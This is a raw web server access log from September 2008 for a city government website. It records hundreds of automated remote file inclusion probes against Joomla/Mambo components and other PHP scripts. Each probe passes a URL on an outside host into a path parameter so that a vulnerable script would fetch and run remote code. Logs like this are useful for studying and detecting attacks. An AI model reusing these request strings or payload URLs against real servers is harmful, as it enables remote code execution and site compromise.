64.202.116.5 - - [01/Sep/2008:00:30:50 -0700] "GET /logs/access.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
74.200.194.170 - - [01/Sep/2008:00:31:40 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
74.200.194.170 - - [01/Sep/2008:00:31:40 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
74.200.194.170 - - [01/Sep/2008:00:31:40 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
12.192.82.221 - - [01/Sep/2008:00:31:41 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [01/Sep/2008:00:31:41 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [01/Sep/2008:00:31:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.38.4.3 - - [01/Sep/2008:00:31:55 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.38.4.3 - - [01/Sep/2008:00:31:55 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.38.4.3 - - [01/Sep/2008:00:31:55 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:31:55 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:31:55 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:31:55 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
209.35.191.113 - - [01/Sep/2008:00:32:02 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "cityofarkadelphia.com"
209.35.191.113 - - [01/Sep/2008:00:32:02 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "cityofarkadelphia.com"
209.35.191.113 - - [01/Sep/2008:00:32:02 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:32:15 -0700] "GET /logs/access.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.72.112.158 - - [01/Sep/2008:00:32:18 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [01/Sep/2008:00:32:18 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [01/Sep/2008:00:32:18 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:32:42 -0700] "GET /logs/access_080201.log%20//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
207.249.0.39 - - [01/Sep/2008:00:32:52 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [01/Sep/2008:00:32:52 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [01/Sep/2008:00:32:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.86.37.2 - - [01/Sep/2008:00:32:55 -0700] "GET //include.php?path[docroot]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "cityofarkadelphia.com"
70.86.37.2 - - [01/Sep/2008:00:32:55 -0700] "GET /logs//include.php?path[docroot]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "cityofarkadelphia.com"
77.222.40.169 - - [01/Sep/2008:00:33:06 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [01/Sep/2008:00:33:07 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [01/Sep/2008:00:33:07 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:00:33:23 -0700] "GET /logs/access_080201.log/errors.php?error=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.6 - - [01/Sep/2008:00:33:40 -0700] "GET /logs/access_080330.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.6 - - [01/Sep/2008:00:33:41 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.6 - - [01/Sep/2008:00:33:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:34:11 -0700] "GET /logs/access_071101.log//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:37:53 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:37:53 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:37:55 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:37:57 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
63.247.138.146 - - [01/Sep/2008:00:41:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
63.247.138.146 - - [01/Sep/2008:00:41:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
91.151.89.176 - - [01/Sep/2008:00:43:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
91.151.89.176 - - [01/Sep/2008:00:43:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:46:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:46:14 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:00:46:45 -0700] "GET //config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [01/Sep/2008:00:53:08 -0700] "GET /logs//?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.19.158.41 - - [01/Sep/2008:00:53:12 -0700] "GET //?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:00:55:20 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:00:55:20 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:00:55:36 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:01:13:16 -0700] "GET /logs/ HTTP/1.0" 200 4068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:13 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:13 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:15 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:37 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:37 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:37 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:57 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:57 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:15:57 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:16:36 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:16:36 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:16:37 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:17:51 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:19:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:19:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.19.225.130 - - [01/Sep/2008:01:19:00 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
69.210.185.1 - - [01/Sep/2008:01:20:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.210.185.1 - - [01/Sep/2008:01:20:00 -0700] "GET //config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.210.185.1 - - [01/Sep/2008:01:20:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:01:20:04 -0700] "GET /errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.210.185.1 - - [01/Sep/2008:01:20:06 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:01:26:57 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:01:26:57 -0700] "GET /logs/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:00 -0700] "GET /logs/access_080501.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:01 -0700] "GET /logs/access_080501.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
209.85.113.26 - - [01/Sep/2008:01:32:01 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
202.125.161.12 - - [01/Sep/2008:01:34:45 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
202.125.161.12 - - [01/Sep/2008:01:34:45 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:37:00 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:37:01 -0700] "GET //?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:37:01 -0700] "GET /logs//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:37:59 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:57 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:57 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:57 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:58 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:58 -0700] "GET /htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:42:58 -0700] "GET /logs/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:43:57 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
65.254.41.162 - - [01/Sep/2008:01:43:58 -0700] "GET /head.php?adresa=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
65.254.41.162 - - [01/Sep/2008:01:43:58 -0700] "GET /logs/head.php?adresa=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:43:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:43:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:44:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:44:18 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:01:44:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://nawl.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:01:45:34 -0700] "GET /logs/access_080201.log//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:01:45:34 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:01:45:34 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:47:57 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:01:47:57 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
88.151.100.136 - - [01/Sep/2008:01:49:21 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "cityofarkadelphia.com"
88.151.100.136 - - [01/Sep/2008:01:49:26 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:01:49:52 -0700] "GET /logs/access_071231.log//components/com_performs/performs.php?mosConfig_absolute_path=http://giam.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:52:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:01:52:43 -0700] "GET //config/dbutil.bck.php?confdir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
204.15.10.22 - - [01/Sep/2008:01:54:37 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "cityofarkadelphia.com"
204.15.10.22 - - [01/Sep/2008:01:54:37 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:54:44 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:54:44 -0700] "GET //config/dbutil.bck.php?confdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:54:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:01:55:13 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.109.34 - - [01/Sep/2008:01:55:38 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nwstars.com/welcome.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.178.228.12 - - [01/Sep/2008:01:56:31 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
